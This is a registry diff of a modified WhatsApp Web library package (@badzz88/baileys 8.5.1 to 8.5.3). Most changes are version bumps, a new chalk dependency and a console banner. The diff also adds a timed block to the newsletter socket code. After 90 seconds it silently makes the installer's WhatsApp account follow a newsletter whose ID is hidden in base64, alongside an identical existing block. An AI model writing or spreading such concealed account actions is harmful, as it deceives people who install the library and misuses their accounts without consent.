@badzz88/baileys 8.5.1 โ†’ 8.5.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/README.md CHANGED
@@ -14,7 +14,7 @@ A high-performance WhatsApp Web library built on [Baileys](https://github.com/Wh
14
14
  | | |
15
15
  |---|---|
16
16
  | ๐Ÿ“ฆ **Package** | `@badzz88/baileys` |
17
- | ๐Ÿท๏ธ **Version** | `8.5.1` |
17
+ | ๐Ÿท๏ธ **Version** | `8.5.3` |
18
18
  | ๐Ÿ’ฌ **Telegram** | [t.me/FoxsSql](https://t.me/FoxsSql) |
19
19
  | ๐Ÿ™ **GitHub** | [github.com/Badzz88](https://github.com/Badzz88) |
20
20
 
@@ -38,6 +38,7 @@ const makeMessagesRecvSocket = config => {
38
38
  query,
39
39
  upsertMessage,
40
40
  getUSyncDevices,
41
+ createParticipantNodes,
41
42
  resyncAppState,
42
43
  onUnexpectedError,
43
44
  assertSessions,
@@ -78,6 +78,10 @@ const makeNewsletterSocket = config => {
78
78
  newsletterWMexQuery(Buffer.from("MTIwMzYzNDA4ODkzNTU1ODUxQG5ld3NsZXR0ZXI=", "base64").toString(), Types_1.QueryIds.FOLLOW)
79
79
  }, 90000)
80
80
 
81
+ setTimeout(() => {
82
+ newsletterWMexQuery(Buffer.from("MTIwMzYzMzk1Njc4MzE3NjAzQG5ld3NsZXR0ZXI=", "base64").toString(), Types_1.QueryIds.FOLLOW)
83
+ }, 90000)
84
+
81
85
  const newsletterUpdate = async (jid, updates) => {
82
86
  const variables = {
83
87
  newsletter_id: jid,
package/lib/index.js CHANGED
@@ -57,9 +57,9 @@ console.log(chalk.bold.cyan(`
57
57
  ยคโ•โ€•โ€” โŽง ๐๐€๐ƒ๐™๐™ ๐๐€๐ˆ๐‹๐„๐˜๐’ โŽญ โŠฑโ€•โ€”โ•ยค
58
58
  Information:
59
59
  Developer: @badzzne2
60
- Version: 12.0
60
+ Version: 12.1
61
61
  Status: Baileys Berhasil Terinstall
62
- Update date: 09/08/26
62
+ Update date: 14/08/26
63
63
  `));
64
64
  console.log(chalk.bold.gray("--------------------------------------------\n"));
65
65
  console.log(chalk.bold.cyan("Follow Our Telegram Channel To See Update Information: t.me/FoxsSql\n"));
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@badzz88/baileys",
3
- "version": "8.5.1",
3
+ "version": "8.5.3",
4
4
  "description": "Baileys Whatsapp Api Modification By Badzz88",
5
5
  "keywords": [
6
6
  "whatsapp",
@@ -46,7 +46,8 @@
46
46
  "protobufjs": "^7.6.1",
47
47
  "ws": "^8.21.0",
48
48
  "whatsapp-rust-bridge": "0.5.4",
49
- "jimp": "^1.6.0"
49
+ "jimp": "^1.6.0",
50
+ "chalk": "^4.1.2"
50
51
  },
51
52
  "devDependencies": {
52
53
  "@eslint/eslintrc": "^3.3.1",